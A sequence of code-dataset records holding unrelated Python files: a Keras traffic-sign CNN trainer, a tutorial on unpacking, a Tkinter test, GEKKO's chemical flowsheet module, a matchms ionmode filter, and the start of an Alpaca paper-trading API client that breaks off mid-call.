model.add(MaxPooling2D(pool_size=(2, 2)))\n    model.add(Dropout(0.2))\n\n    model.add(Conv2D(64, (3, 3), padding='same',\n                     activation='relu'))\n    model.add(Conv2D(64, (3, 3), activation='relu'))\n    model.add(MaxPooling2D(pool_size=(2, 2)))\n    model.add(Dropout(0.2))\n\n    model.add(Conv2D(128, (3, 3), padding='same',\n                     activation='relu'))\n    model.add(Conv2D(128, (3, 3), activation='relu'))\n    model.add(MaxPooling2D(pool_size=(2, 2)))\n    model.add(Dropout(0.2))\n\n    model.add(Flatten())\n    model.add(Dense(512, activation='relu'))\n    model.add(Dropout(0.5))\n    model.add(Dense(NUM_CLASSES, activation='softmax'))\n    return model\n\ndef lr_schedule(epoch):\n    return lr*(0.1**int(epoch/10))\n\nmodel = cnn_model()\n# let's train the model using SGD + momentum (how original).\nlr = 0.01\nsgd = SGD(lr=lr, decay=1e-6, momentum=0.9, nesterov=True)\nmodel.compile(loss='categorical_crossentropy',\n          optimizer=sgd,\n          metrics=['accuracy'])\n\nprint(model.summary())\n\ntest = pd.read_csv('/home/aref/datasets/GTSRB/GT-final_test.csv',sep=';')\nX_test = []\ny_test = []\nfor file_name, class_id in zip(list(test['Filename']), list(test['ClassId'])):\n    img_path = os.path.join('/home/aref/datasets/GTSRB/Final_Test/Images/',file_name)\n    X_test.append(preprocess_img(io.imread(img_path)))\n    y_test.append(class_id)\n\nX_test = np.array(X_test)\ny_test = np.array(y_test)\ny_test = keras.utils.to_categorical(y_test, NUM_CLASSES)\n\nmodel.fit(X, Y,\n          batch_size=batch_size,\n          epochs=epochs,\n          verbose=1,\n          # validation_split=0.2,\n          validation_data=(X_test,y_test),\n          shuffle=True,\n          callbacks=[LearningRateScheduler(lr_schedule),\n                    EpochWeightsSaver(model, 1)])\n\nmodel_path = os.path.join(save_dir, model_name)\nmodel.save(model_path)\nprint('Saved trained model at %s ' % model_path)\n\nscore = model.evaluate(X_test, y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n","sub_path":"python/gtsd-1.py","file_name":"gtsd-1.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"565385141","text":"# unpacking raises an error if the number of targets does not match the number of values.\n\nregistro = ('renzo',35)\nnome, idade = registro\nnome #returns 'renzo'\nidade #returns 35\n\nlista = ['luiz','joao','maria',1,2,3,4,5,6,7]\nn1,n2,n3,*outros,ultimo_da_lista = lista #use an asterisk to collect a variable number of items into a list\nprint(n1,n2,n3,outros,ultimo_da_lista)\n\n\n #unpacking to pass arguments\ndef listar_itens(w,x,y,z):\n    print(w,x,y,z)\n\nlista = 
[12,32,43,55]\nlistar_itens(*lista) #unpacks the list so each value is sent as a separate argument\n\n #tuple unpacking with a for loop\n\ntupla = (\"sator\",\"arepo\", \"tenet\",'opera','rotas')\nfor des, en, paco, ta, mento in tupla:\n    print(des, en, paco, ta, mento)\n\nprint(\"----\\n\")\nstring= ('adfa')\nfor indice,elemento in enumerate(string):\n    print(indice,elemento)\n\n#--------------------z-desenpacotamento-z with *args\n\ndef my_sum(*args):\n    print(args) #*args receives a variable number of arguments, which are packed into a tuple\n    print(type(args)) #type tuple\n    return sum(args) #sum function\n","sub_path":"1-Estruturas de dados/containers/z-desenpacotamento-z/desempacotamento.py","file_name":"desempacotamento.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"569672245","text":"from Tkinter import *\n\n\nroot = Tk()\ntext = Text(root)\ntext.insert(INSERT, \"Some example text.\\n Some second line of example text\")\n\ndef onclick(event):\n    print(event.__class__)\n    #event.widget.mark_set(INSERT, '1.0')\n    event.widget.see(SEL)\n    #print event.widget.get('linetwo', END)\n\n\n\ntext.bind('<Button-1>', onclick)\ntext.mark_set(\"linetwo\", '2.0')\ntext.tag_add(SEL, '1.0', END)\n#text.bind('', onclick)\n\ntext.pack()\n\n\nroot.mainloop()","sub_path":"Tour/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"201264835","text":"# -*- coding: utf-8 -*-\r\nfrom gekko import GEKKO\r\nimport numpy as np\r\nfrom .gk_parameter import GKParameter\r\nfrom .gk_variable import GKVariable\r\n\"\"\"\r\nGEKKO specializes in optimization and control. This module extends GEKKO with \r\nchemical compounds, thermodynamic properties, and flowsheet objects.\r\n\"\"\"\r\n\r\nclass Properties():\r\n    \r\n    def __init__(self,m):\r\n        self.m = m\r\n        # True if thermo object is created\r\n        # Enforces compound definition before thermo_obj definition\r\n        self._thermo_obj = False\r\n    \r\n    def compound(self,name):\r\n        \"\"\" Add chemical compound to model with one of the following:\r\n        1. IUPAC Name (1,2-ethanediol)\r\n        2. Common Name (ethylene glycol) \r\n        3. CAS Number (107-21-1)\r\n        4. Formula (C2H6O2)\r\n        Repeated compounds are permitted. All compounds should be declared\r\n        before thermo objects are created. 
An error message will occur if\r\n the compound is not in the database and a file 'compounds.txt' will\r\n be created to communicate the available compounds.\r\n \"\"\" \r\n #verify that compound is not added after thermo objects\r\n if self._thermo_obj:\r\n raise TypeError(\"Define compound (\"+name+\") before creating a thermo object\")\r\n # add compound name\r\n self.m._compounds.append(name)\r\n return\r\n \r\n def thermo(self,prop,T=300.0):\r\n \"\"\" Thermodynamic Properties\r\n usage: thermo('mw') for constants\r\n thermo('lvp',T) for temperature dependent\r\n ---- Temperature Independent ----\r\n mw = Molecular Weight (kg/kmol)\r\n tc = Critical Temperature (K)\r\n pc = Critical Pressure (Pa)\r\n vc = Critical Volume (m^3/kmol)\r\n ccf = Crit Compress Factor (unitless)\r\n mp = Melting Point (K)\r\n tpt = Triple Pt Temperature (K)\r\n tpp = Triple Pt Pressure (Pa)\r\n nbp = Normal Boiling Point (K)\r\n lmv = Liq Molar Volume (m^3/kmol)\r\n ighf = IG Heat of Formation (J/kmol)\r\n iggf = IG Gibbs of Formation (J/kmol)\r\n igae = IG Absolute Entropy (J/kmol*K)\r\n shf = Std Heat of Formation (J/kmol)\r\n sgf = Std Gibbs of Formation (J/kmol)\r\n sae = Std Absolute Entropy (J/kmol*K)\r\n hfmp = Heat Fusion at Melt Pt (J/kmol)\r\n snhc = Std Net Heat of Comb (J/kmol)\r\n af = Acentric Factor (unitless)\r\n rg = Radius of Gyration (m)\r\n sp = Solubility Parameter ((J/m^3)^0.5)\r\n dm = Dipole Moment (c*m)\r\n r = van der Waals Volume (m^3/kmol)\r\n q = van der Waals Area (m^2)\r\n ri = Refractive Index (unitless)\r\n fp = Flash Point (K)\r\n lfl = Lower Flammability Limit (K)\r\n ufl = Upper Flammability Limit (K)\r\n lflt = Lower Flamm Limit Temp (K)\r\n uflt = Upper Flamm Limit Temp (K)\r\n ait = Auto Ignition Temp (K)\r\n ---- Temperature Dependent ---- \r\n sd = Solid Density (kmol/m^3)\r\n ld = Liquid Density (kmol/m^3) \r\n svp = Solid Vapor Pressure (Pa) \r\n lvp = Liquid Vapor Pressure (Pa) \r\n hvap = Heat of Vaporization (J/kmol) \r\n scp = Solid Heat Capacity (J/kmol*K) \r\n lcp = Liquid Heat Capacity (J/kmol*K) \r\n igcp = Ideal Gas Heat Capacity (J/kmol*K) \r\n svc = Second Virial Coefficient (m^3/kmol) \r\n lv = Liquid Viscosity (Pa*s) \r\n vv = Vapor Viscosity (Pa*s) \r\n sk = Solid Thermal Conductivity (W/m*K) \r\n lk = Liq Thermal Conductivity (W/m*K) \r\n vk = Vap Thermal Conductivity (W/m*K) \r\n st = Surface Tension (N/m) \r\n sh = Solid Enthalpy (J/kmol) \r\n lh = Liq Enthalpy (J/kmol) \r\n vh = Vap Enthalpy (J/kmol) \r\n \"\"\"\r\n self._thermo_obj = True\r\n prop = prop.lower()\r\n \r\n # check if it is a temperature dependent property\r\n tdp = ['sd','ld','lv','vv','sk','lk','vk','st','sh','lh','vh',\\\r\n 'svp','lvp','scp','lcp','svc','hvap','igcp']\r\n if prop.lower() in tdp:\r\n td = True\r\n # inquire if T is a valid GEKKO variable or parameter\r\n if isinstance(T,(GKVariable,GKParameter)):\r\n Tin = T\r\n else:\r\n # create input variable if it is an expression\r\n Tin = self.m.Var()\r\n self.m.Equation(Tin==T)\r\n else:\r\n td = False\r\n\r\n # build thermo object with unique object name\r\n thermo_name = 'thermo_' + str(len(self.m._objects) + 1)\r\n self.m._objects.append(thermo_name+'=thermo_'+prop)\r\n\r\n # add connections between y and thermo object attribute y\r\n if not td: # not temperature dependent\r\n y = {}\r\n i = 0\r\n for c in self.m._compounds:\r\n i += 1\r\n y[c] = self.m.Param()\r\n self.m._connections.append(y[c].name+'='+thermo_name+'.'+prop+'['+str(i)+']')\r\n else: # temperature dependent\r\n y = {}\r\n i = 0\r\n for c in 
self.m._compounds:\r\n i += 1\r\n y[c] = self.m.Var()\r\n self.m._connections.append(y[c].name+'='+thermo_name+'.'+prop+'['+str(i)+']')\r\n # link temperature\r\n y['T'] = Tin\r\n self.m._connections.append(Tin.name+'='+thermo_name+'.T')\r\n \r\n # add units and property description\r\n if (prop=='mw'): y['units']='kg/kmol'; y['property']='Molecular Weight'\r\n if (prop=='tc'): y['units']='K'; y['property']='Critical Temperature'\r\n if (prop=='pc'): y['units']='Pa'; y['property']='Critical Pressure'\r\n if (prop=='vc'): y['units']='m^3/kmol'; y['property']='Critical Volume'\r\n if (prop=='ccf'): y['units']='unitless'; y['property']='Crit Compress Factor'\r\n if (prop=='mp'): y['units']='K'; y['property']='Melting Point'\r\n if (prop=='tpt'): y['units']='K'; y['property']='Triple Pt Temperature'\r\n if (prop=='tpp'): y['units']='Pa'; y['property']='Triple Pt Pressure'\r\n if (prop=='nbp'): y['units']='K'; y['property']='Normal Boiling Point'\r\n if (prop=='lmv'): y['units']='m^3/kmol'; y['property']='Liq Molar Volume'\r\n if (prop=='ighf'): y['units']='J/kmol'; y['property']='IG Heat of Formation'\r\n if (prop=='iggf'): y['units']='J/kmol'; y['property']='IG Gibbs of Formation'\r\n if (prop=='igae'): y['units']='J/kmol-K'; y['property']='IG Absolute Entropy'\r\n if (prop=='shf'): y['units']='J/kmol'; y['property']='Std Heat of Formation'\r\n if (prop=='sgf'): y['units']='J/kmol'; y['property']='Std Gibbs of Formation'\r\n if (prop=='sae'): y['units']='J/kmol-K'; y['property']='Std Absolute Entropy'\r\n if (prop=='hfmp'): y['units']='J/kmol'; y['property']='Heat Fusion at Melt Pt'\r\n if (prop=='snhc'): y['units']='J/kmol'; y['property']='Std Net Heat of Comb'\r\n if (prop=='af'): y['units']='unitless'; y['property']='Acentric Factor'\r\n if (prop=='rg'): y['units']='m'; y['property']='Radius of Gyration'\r\n if (prop=='sp'): y['units']='(J/m^3)^0.5'; y['property']='Solubility Parameter'\r\n if (prop=='dm'): y['units']='c*m'; y['property']='Dipole Moment'\r\n if (prop=='r'): y['units']='m^3/kmol'; y['property']='van der Waals Volume'\r\n if (prop=='q'): y['units']='m^2'; y['property']='van der Waals Area'\r\n if (prop=='ri'): y['units']='unitless'; y['property']='Refractive Index'\r\n if (prop=='fp'): y['units']='K'; y['property']='Flash Point'\r\n if (prop=='lfl'): y['units']='K'; y['property']='Lower Flammability Limit'\r\n if (prop=='ufl'): y['units']='K'; y['property']='Upper Flammability Limit'\r\n if (prop=='lflt'): y['units']='K'; y['property']='Lower Flamm Limit Temp'\r\n if (prop=='uflt'): y['units']='K'; y['property']='Upper Flamm Limit Temp'\r\n if (prop=='ait'): y['units']='K'; y['property']='Auto Ignition Temp'\r\n if (prop=='sd'): y['units']='kmol/m^3'; y['property']='Solid Density'\r\n if (prop=='ld'): y['units']='kmol/m^3 '; y['property']='Liquid Density'\r\n if (prop=='svp'): y['units']='Pa '; y['property']='Solid Vapor Pressure'\r\n if (prop=='lvp'): y['units']='Pa '; y['property']='Liquid Vapor Pressure'\r\n if (prop=='hvap'): y['units']='J/kmol '; y['property']='Heat of Vaporization'\r\n if (prop=='scp'): y['units']='J/kmol-K '; y['property']='Solid Heat Capacity'\r\n if (prop=='lcp'): y['units']='J/kmol-K '; y['property']='Liquid Heat Capacity'\r\n if (prop=='igcp'): y['units']='J/kmol-K '; y['property']='Ideal Gas Heat Capacity'\r\n if (prop=='svc'): y['units']='m^3/kmol '; y['property']='Second Virial Coefficient'\r\n if (prop=='lv'): y['units']='Pa*s '; y['property']='Liquid Viscosity'\r\n if (prop=='vv'): y['units']='Pa*s '; y['property']='Vapor Viscosity'\r\n if 
(prop=='sk'): y['units']='W/m-K '; y['property']='Solid Thermal Conductivity'\r\n if (prop=='lk'): y['units']='W/m-K '; y['property']='Liq Thermal Conductivity'\r\n if (prop=='vk'): y['units']='W/m-K '; y['property']='Vap Thermal Conductivity'\r\n if (prop=='st'): y['units']='N/m '; y['property']='Surface Tension'\r\n if (prop=='sh'): y['units']='J/kmol '; y['property']='Solid Enthalpy'\r\n if (prop=='lh'): y['units']='J/kmol '; y['property']='Liq Enthalpy'\r\n if (prop=='vh'): y['units']='J/kmol '; y['property']='Vap Enthalpy'\r\n \r\n return y\r\n\r\nclass StreamObj:\r\n '''Stream Object\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n ndot = Molar flow rate (kmol/sec)\r\n x = Array of mole fractions\r\n phase = Phase (solid, liquid, vapor)\r\n '''\r\n name = ''\r\n P = None\r\n T = None\r\n ndot = None\r\n x = []\r\n phase = None\r\n \r\nclass ReserveObj:\r\n '''Reserve Object\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n n = Molar holdup (kmol)\r\n x = Array of mole fractions\r\n phase = Phase (solid, liquid, vapor)\r\n '''\r\n name = ''\r\n P = None\r\n T = None\r\n n = None\r\n x = []\r\n phase = None\r\n\r\nclass FlashObj:\r\n '''Flash Object\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n Q = Heat input (kJ/sec)\r\n gamma = Activity coefficients\r\n n = Molar holdup in flash column (kmol)\r\n inlet = Inlet stream\r\n reserve = Molar holdup\r\n vapor = Vapor stream\r\n liquid = Liquid stream\r\n '''\r\n name = ''\r\n P = None\r\n T = None\r\n Q = None\r\n gamma = []\r\n n = None\r\n inlet = ''\r\n reserve = ''\r\n vapor = ''\r\n liquid = ''\r\n\r\nclass Flowsheet(): \r\n def __init__(self,m,stream_level=1):\r\n # record the GEKKO instances where the objects are added\r\n self.m = m\r\n self.sl = stream_level # use pressure and energy balance\r\n if self.sl>=1:\r\n # use t,p,h,ndot,x[i] with STREAM_LEVEL = 1\r\n # models such as flash or other VLE require this\r\n self.m.options.STREAM_LEVEL = 1\r\n else:\r\n # use ndot,x[i] with STREAM_LEVEL = 0\r\n # track compositions only for blending and transport calculations\r\n self.m.options.STREAM_LEVEL = 0\r\n return\r\n \r\n def connect_streams(self,s1,s2):\r\n '''Connect two streams\r\n The first stream dictates the properties of the combined stream.\r\n \r\n connect_streams(s1,s2)\r\n \r\n s1 = stream object or name of stream 1 (string)\r\n s2 = stream object or name of stream 2 (string)\r\n '''\r\n try:\r\n c1 = s1.name\r\n except:\r\n c1 = s1\r\n \r\n try:\r\n c2 = s2.name\r\n except:\r\n c2 = s2\r\n # add connection for streams with * to connect all elements\r\n try:\r\n self.m._connections.append(c1+'.*='+c2+'.*')\r\n except:\r\n raise Exception('Function connect_streams: inputs must be strings or objects with a name property')\r\n return\r\n \r\n def set_phase(self,y,phase='liquid'):\r\n '''Set Phase\r\n set_phase(y,phase='liquid')\r\n\r\n Set phase of a Stream or Reserve Object as 'solid', 'liquid', or 'vapor'\r\n '''\r\n # stream phase\r\n if phase==None:\r\n self.m._connections.append(y.name+'.sfrc=0')\r\n self.m._connections.append(y.name+'.lfrc=0')\r\n self.m._connections.append(y.name+'.vfrc=1')\r\n else:\r\n if not (type(phase)==type('string')):\r\n raise Exception('Phase must be a string: solid, liquid, or vapor')\r\n if phase.lower()=='solid':\r\n self.m._connections.append(y.name+'.sfrc=1')\r\n self.m._connections.append(y.name+'.lfrc=0')\r\n self.m._connections.append(y.name+'.vfrc=0')\r\n elif phase.lower()=='liquid':\r\n self.m._connections.append(y.name+'.sfrc=0')\r\n 
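# liquid phase: all material is assigned to the liquid fraction\r\n                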
self.m._connections.append(y.name+'.lfrc=1')\r\n                self.m._connections.append(y.name+'.vfrc=0')\r\n            elif phase.lower()=='vapor':\r\n                self.m._connections.append(y.name+'.sfrc=0')\r\n                self.m._connections.append(y.name+'.lfrc=0')\r\n                self.m._connections.append(y.name+'.vfrc=1')\r\n            else:\r\n                raise Exception('Phase must be a string: solid, liquid, or vapor')\r\n\r\n        return\r\n\r\n    def stream(self,sobj=None):\r\n        '''\r\n        stream(sobj=None)\r\n\r\n        Stream Object: \r\n          sobj = StreamObj()\r\n          P = Pressure (Pa)\r\n          T = Temperature (K)\r\n          ndot = Molar flow rate (kmol/sec)\r\n          x = Array of mole fractions\r\n          ph = Phase (Integer with 1=solid, 2=liquid, 3=vapor)\r\n        '''\r\n        self._thermo_obj = True\r\n        if sobj==None:\r\n            y = StreamObj()\r\n        else:\r\n            y = sobj\r\n\r\n        # build stream (Feed) object with unique object name\r\n        y.name = 'stream_' + str(len(self.m._objects) + 1)\r\n        self.m._objects.append(y.name+'=Feed')\r\n        \r\n        if self.sl>=1:\r\n            # pressure\r\n            if y.P==None:\r\n                y.P = self.m.Param(101325.0)\r\n            else:\r\n                if not isinstance(y.P,(GKVariable,GKParameter)):\r\n                    # create input variable if it is an expression\r\n                    Pin = self.m.Var()\r\n                    self.m.Equation(Pin==y.P)\r\n                    y.P = Pin\r\n            # temperature\r\n            if y.T==None:\r\n                y.T = self.m.Param(300.0)\r\n            else:\r\n                if not isinstance(y.T,(GKVariable,GKParameter)):\r\n                    # create input variable if it is an expression\r\n                    Tin = self.m.Var()\r\n                    self.m.Equation(Tin==y.T)\r\n                    y.T = Tin\r\n            # stream phase\r\n            if y.phase==None:\r\n                y.phase = 'liquid'\r\n                self.m._connections.append(y.name+'.sfrc=0')\r\n                self.m._connections.append(y.name+'.lfrc=0')\r\n                self.m._connections.append(y.name+'.vfrc=1')\r\n            else:\r\n                if not (type(y.phase)==type('string')):\r\n                    raise Exception('Phase must be a string: solid, liquid, or vapor')\r\n                if y.phase.lower()=='solid':\r\n                    self.m._connections.append(y.name+'.sfrc=1')\r\n                    self.m._connections.append(y.name+'.lfrc=0')\r\n                    self.m._connections.append(y.name+'.vfrc=0')\r\n                elif y.phase.lower()=='liquid':\r\n                    self.m._connections.append(y.name+'.sfrc=0')\r\n                    self.m._connections.append(y.name+'.lfrc=1')\r\n                    self.m._connections.append(y.name+'.vfrc=0')\r\n                elif y.phase.lower()=='vapor':\r\n                    self.m._connections.append(y.name+'.sfrc=0')\r\n                    self.m._connections.append(y.name+'.lfrc=0')\r\n                    self.m._connections.append(y.name+'.vfrc=1')\r\n                else:\r\n                    raise Exception('Phase must be a string: solid, liquid, or vapor')\r\n        # molar flow\r\n        if y.ndot==None:\r\n            y.ndot = self.m.Param(1.0)\r\n        else:\r\n            if not isinstance(y.ndot,(GKVariable,GKParameter)):\r\n                # create input variable if it is an expression\r\n                ndotin = self.m.Var()\r\n                self.m.Equation(ndotin==y.ndot)\r\n                y.ndot = ndotin\r\n        # mole fractions\r\n        if y.x==[]:\r\n            y.x = [None]*len(self.m._compounds)\r\n            for i in range(len(self.m._compounds)):\r\n                y.x[i] = self.m.Param(1.0/max(1.0,float(len(self.m._compounds))))\r\n        else:\r\n            if len(y.x)!=len(self.m._compounds):\r\n                raise Exception('Error: length of mole fraction variable array (x) must match number of declared compounds: '+str(len(self.m._compounds)))\r\n            for i in range(len(self.m._compounds)):\r\n                if not isinstance(y.x[i],(GKVariable,GKParameter)):\r\n                    # create input variable if it is an expression\r\n                    xi = self.m.Var()\r\n                    self.m.Equation(xi==y.x[i])\r\n                    y.x[i] = xi\r\n            # additional equation for last mole fraction\r\n            if isinstance(y.x[i],GKVariable):\r\n                self.m.Equation(y.x[-1]==1-sum(y.x[0:-1]))\r\n\r\n        self.m._connections.append(y.P.name+'='+y.name+'.P')\r\n        self.m._connections.append(y.T.name+'='+y.name+'.T')\r\n        
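# tie the flow rate and composition variables to the Feed object's attributes\r\n        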
self.m._connections.append(y.ndot.name+'='+y.name+'.ndot')\r\n        # don't connect last mole fraction to stream object (explicit calc)\r\n        for i in range(len(self.m._compounds)-1):\r\n            self.m._connections.append(y.x[i].name+'='+y.name+'.x['+str(i+1)+']')\r\n        \r\n        return y \r\n\r\n    def flash(self,fo=None):\r\n        '''\r\n        flash(fo=None)\r\n\r\n        Input: Flash object\r\n          P = Pressure (Pa)\r\n          T = Temperature (K)\r\n          Q = Heat input (kJ/sec)\r\n          inlet = inlet stream name\r\n          vapor = vapor outlet stream name\r\n          liquid = liquid outlet stream name\r\n        '''\r\n        self._thermo_obj = True\r\n        if fo==None:\r\n            y = FlashObj()\r\n        else:\r\n            y = fo\r\n        \r\n        # build flash object with unique object name\r\n        y.name = 'flash_' + str(len(self.m._objects) + 1)\r\n        self.m._objects.append(y.name+'=Flash')\r\n        \r\n        if self.sl==0:\r\n            raise Exception('Stream level required >=1 for flash calculation')\r\n        \r\n        # pressure\r\n        if y.P==None:\r\n            y.P = self.m.Param(101325.0)\r\n        else:\r\n            if not isinstance(y.P,(GKVariable,GKParameter)):\r\n                # create input variable if it is an expression\r\n                Pin = self.m.Var()\r\n                self.m.Equation(Pin==y.P)\r\n                y.P = Pin\r\n        # temperature\r\n        if y.T==None:\r\n            y.T = self.m.Var(300.0)\r\n        else:\r\n            if not isinstance(y.T,(GKVariable,GKParameter)):\r\n                # create input variable if it is an expression\r\n                Tin = self.m.Var()\r\n                self.m.Equation(Tin==y.T)\r\n                y.T = Tin\r\n        # heat input\r\n        if y.Q==None:\r\n            y.Q = self.m.Param(0.0)\r\n        else:\r\n            if not isinstance(y.Q,(GKVariable,GKParameter)):\r\n                # create input variable if it is an expression\r\n                Qin = self.m.Var()\r\n                self.m.Equation(Qin==y.Q)\r\n                y.Q = Qin\r\n        # activity coefficients\r\n        if y.gamma==[]:\r\n            y.gamma = [None]*len(self.m._compounds)\r\n            for i in range(len(self.m._compounds)):\r\n                y.gamma[i] = self.m.Param(1.0)\r\n        else:\r\n            if len(y.gamma)!=len(self.m._compounds):\r\n                raise Exception('Error: length of activity coefficient array (gamma) must match number of declared compounds: '+str(len(self.m._compounds)))\r\n            for i in range(len(self.m._compounds)):\r\n                if not isinstance(y.gamma[i],(GKVariable,GKParameter)):\r\n                    # create input variable if it is an expression\r\n                    gi = self.m.Var()\r\n                    self.m.Equation(gi==y.gamma[i])\r\n                    y.gamma[i] = gi\r\n        # names of inlet stream (1) and outlet streams (2)\r\n        y.inlet = y.name + '.inlet'\r\n        y.vapor = y.name + '.outlet_vap'\r\n        y.liquid = y.name + '.outlet_liq'\r\n\r\n        # connect to flash and stream pressure, temperature (outlet)\r\n        self.m._connections.append(y.P.name+'='+y.inlet+'.P')\r\n        self.m._connections.append(y.T.name+'='+y.liquid+'.T')\r\n        self.m._connections.append(y.Q.name+'='+y.name+'.Q')\r\n        \r\n        for i in range(len(self.m._compounds)):\r\n            self.m._connections.append(y.gamma[i].name+'='+y.name+'.gamma['+str(i+1)+']')\r\n        \r\n        return y\r\n\r\n\r\n    def flash_column(self,fo=None):\r\n        '''\r\n        flash_column(fo=None)\r\n\r\n        Input: Flash object\r\n          P = Pressure (Pa)\r\n          T = Temperature (K)\r\n          Q = Heat input (kJ/sec)\r\n          n = Holdup (kmol)\r\n          inlet = inlet stream name\r\n          vapor = vapor outlet stream name\r\n          liquid = liquid outlet stream name\r\n        '''\r\n        self._thermo_obj = True\r\n        if fo==None:\r\n            y = FlashObj()\r\n        else:\r\n            y = fo\r\n        \r\n        # build flash object with unique object name\r\n        y.name = 'flash_column_' + str(len(self.m._objects) + 1)\r\n        self.m._objects.append(y.name+'=Flash_Column')\r\n        \r\n        if self.sl==0:\r\n            raise Exception('Stream level required >=1 for flash calculation')\r\n        \r\n        # pressure\r\n        if y.P==None:\r\n            y.P = self.m.Param(101325.0)\r\n        else:\r\n            if not 
isinstance(y.P,(GKVariable,GKParameter)):\r\n                # create input variable if it is an expression\r\n                Pin = self.m.Var()\r\n                self.m.Equation(Pin==y.P)\r\n                y.P = Pin\r\n        # temperature\r\n        if y.T==None:\r\n            y.T = self.m.Var(300.0)\r\n        else:\r\n            if not isinstance(y.T,(GKVariable,GKParameter)):\r\n                # create input variable if it is an expression\r\n                Tin = self.m.Var()\r\n                self.m.Equation(Tin==y.T)\r\n                y.T = Tin\r\n        # heat input\r\n        if y.Q==None:\r\n            y.Q = self.m.Param(0.0)\r\n        else:\r\n            if not isinstance(y.Q,(GKVariable,GKParameter)):\r\n                # create input variable if it is an expression\r\n                Qin = self.m.Var()\r\n                self.m.Equation(Qin==y.Q)\r\n                y.Q = Qin\r\n        # molar holdup\r\n        if y.n==None:\r\n            y.n = self.m.Param(1.0)\r\n        else:\r\n            if not isinstance(y.n,(GKVariable,GKParameter)):\r\n                # create input variable if it is an expression\r\n                nin = self.m.Var()\r\n                self.m.Equation(nin==y.n)\r\n                y.n = nin\r\n        # activity coefficients\r\n        if y.gamma==[]:\r\n            y.gamma = [None]*len(self.m._compounds)\r\n            for i in range(len(self.m._compounds)):\r\n                y.gamma[i] = self.m.Param(1.0)\r\n        else:\r\n            if len(y.gamma)!=len(self.m._compounds):\r\n                raise Exception('Error: length of activity coefficient array (gamma) must match number of declared compounds: '+str(len(self.m._compounds)))\r\n            for i in range(len(self.m._compounds)):\r\n                if not isinstance(y.gamma[i],(GKVariable,GKParameter)):\r\n                    # create input variable if it is an expression\r\n                    gi = self.m.Var()\r\n                    self.m.Equation(gi==y.gamma[i])\r\n                    y.gamma[i] = gi\r\n        # names of inlet stream (1) and outlet streams (2)\r\n        y.inlet = y.name + '.feed'\r\n        y.reserve = y.name + '.holdup.reserve'\r\n        y.vapor = y.name + '.flash.outlet_vap'\r\n        y.liquid = y.name + '.flash.outlet_liq'\r\n\r\n        # connect to flash and stream pressure, temperature (outlet)\r\n        self.m._connections.append(y.P.name+'='+y.inlet+'.P')\r\n        self.m._connections.append(y.T.name+'='+y.liquid+'.T')\r\n        self.m._connections.append(y.Q.name+'='+y.name+'.flash.Q')\r\n        self.m._connections.append(y.n.name+'='+y.reserve+'.n')\r\n        \r\n        for i in range(len(self.m._compounds)):\r\n            self.m._connections.append(y.gamma[i].name+'='+y.name+'.flash.gamma['+str(i+1)+']')\r\n        \r\n        return y\r\n\r\n    \r\n# def holdup\r\n    \r\n#    def flash(self,prop,T=300.0):\r\n\r\n    # --- flowsheet objects in APMonitor but not GEKKO ---\r\n    # feedback,\r\n    \r\n#    mass, massflow, massflows, molarflows \r\n#    mixer, pid, poly_reactor, pump, reactor, recovery, splitter,\r\n#    stage_1, stage_2, stream_lag, thermo, vessel, vesselm\r\n","sub_path":"gekko/chemical.py","file_name":"chemical.py","file_ext":"py","file_size_in_byte":25095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"362834284","text":"from ..importing import load_adducts\nfrom ..typing import SpectrumType\n\n\ndef derive_ionmode(spectrum_in: SpectrumType, adducts_filename: str = None) -> SpectrumType:\n    \"\"\"Derive missing ionmode based on adduct.\n\n    Some input formats (e.g. MGF files) do not always provide a correct ionmode.\n    This function reads the adduct from the metadata and uses this to fill in the\n    correct ionmode where missing.\n\n    Parameters\n    ----------\n    spectrum_in:\n        Input spectrum.\n    adducts_filename:\n        Load known adducts from file, if filename is given. 
Default is None.\n Method makes sure that file loading is cached.\n\n Returns:\n --------\n\n Returns Spectrum object with `ionmode` attribute set.\n \"\"\"\n\n if spectrum_in is None:\n return None\n\n spectrum = spectrum_in.clone()\n\n # Load lists of known adducts\n known_adducts = load_adducts(filename=adducts_filename)\n\n adduct = spectrum.get(\"adduct\", None)\n # Harmonize adduct string\n if adduct:\n adduct = adduct.replace(\"\\n\", \"\") \\\n .replace(\" \", \"\") \\\n .replace(\"[\", \"\") \\\n .replace(\"]\", \"\") \\\n .replace(\"*\", \"\")\n\n ionmode = spectrum.get(\"ionmode\")\n if ionmode:\n assert ionmode == ionmode.lower(), (\"Ionmode field not harmonized.\",\n \"Apply 'make_ionmode_lowercase' filter first.\")\n\n # Try completing missing or incorrect ionmodes\n if ionmode not in [\"positive\", \"negative\"]:\n if adduct in known_adducts[\"adducts_positive\"]:\n ionmode = \"positive\"\n print(\"Added ionmode '\" + ionmode + \"' based on adduct: \", adduct)\n elif adduct in known_adducts[\"adducts_negative\"]:\n ionmode = \"negative\"\n print(\"Added ionmode '\" + ionmode + \"' based on adduct: \", adduct)\n else:\n ionmode = \"n/a\"\n spectrum.set(\"ionmode\", ionmode)\n\n return spectrum\n","sub_path":"matchms/filtering/derive_ionmode.py","file_name":"derive_ionmode.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648088446","text":"import requests\nimport json\nfrom config import *\n\nHEADERS = {'APCA-API-KEY-ID': API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY}\nBASE_URL = 'https://paper-api.alpaca.markets'\nACCOUNT_URL = '{}/v2/account'.format(BASE_URL)\nORDERS_URL = '{}/v2/orders'.format(BASE_URL)\n\n\ndef get_account():\n r = requests.get(ACCOUNT_URL, headers=HEADERS)\n\n return json.loads(r.content)\n\ndef create_order(symbol, qty, side, type, time_in_force):\n data = {\n 'symbol': symbol,\n 'qty': qty,\n 'side': side,\n 'type': type,\n 'time_in_force': time_in_force\n }\n\n r = requests.post(ORDERS_URL, json=data, 